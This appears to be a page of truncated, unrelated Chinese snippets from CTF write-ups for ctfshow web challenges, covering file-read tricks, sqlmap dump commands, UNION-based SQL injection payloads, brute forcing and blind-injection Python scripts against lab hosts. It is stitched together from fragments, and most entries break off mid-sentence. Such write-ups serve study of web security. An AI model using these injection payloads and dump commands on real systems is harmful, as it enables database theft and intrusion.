查看源代码,发现文件指针 并且可以读取文件 去读WEB-INF/web.xml,发现存在con.ctfshow.servlet.GetFlag 读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class,因为是class文件字符有点乱,发现fl3g web300-文件读取 和上题一样 找到的flag叫f1bg 补充:以上题目中缺少三个struts2漏洞 因为是第一次了解关于Java漏...
id=1 --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" --dump web202 也是sqlmap的使用 $ sqlmap -u "http://5d506c45-1336-4345-858f-1de6dacef1a1.challenge.ctf.show:8080/api/" --data="id=1" --level=3 --risk=3 $ sqlmap -u "http://5d506c45-1336-4345-858f-1de6d...
web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这...
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]} 1.payload2: make_payload("select * from ctfshow_flagasa;"){"code...
web24是rand(0,300)和sleep(3),修改一下参数就能跑 # coding: utf-8 # Auth: y2hlbmc import requests import time import threading url = "http://7dbded2a-12d4-4d3a-a8c5-ddc6d8e78d74.challenge.ctf.show/" def Thread(fun,*args): return threading.Thread(target=fun, args=args) def ...
web175 解法一 解法二 web176 解法一 解法二 web177 web 178 解法一 解法二 web179 ...
打开题目得到的是一个json数据,看了一眼题目fastapi,百度告诉我们FastAPI是基于python3.6+和标准python类型的一个现代化的,快速的(高性能),构建api的web框架。 Fast: 非常高的性能,媲美nodejs和go。可用的最快的Python框架之一. Fast to Code增加了200%~300%开发功能的速度 ...
web 189首先找到flag的位置,接着再对flag进行盲注,这个题,是在web 188的基础上进行的修改import requests url = "http://8cccbace-cc29-4542-a78d-b0f3261ed4f5.challenge.ctf.show:8080/api/" def getflagPosition():#返回flag的位置 head=1 tail=300 while head<tail: mid=(head+tail)>>1 data={...
web签到<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-11-10 17:20:38 # @Last Modified by: h1xa # @Last Modified time: 2022-11-11 09:38:59 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__); ...
web171 首先尝试1'--+,发现有返回值;说明直接闭合正确; 接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来) 查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web 爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_sche...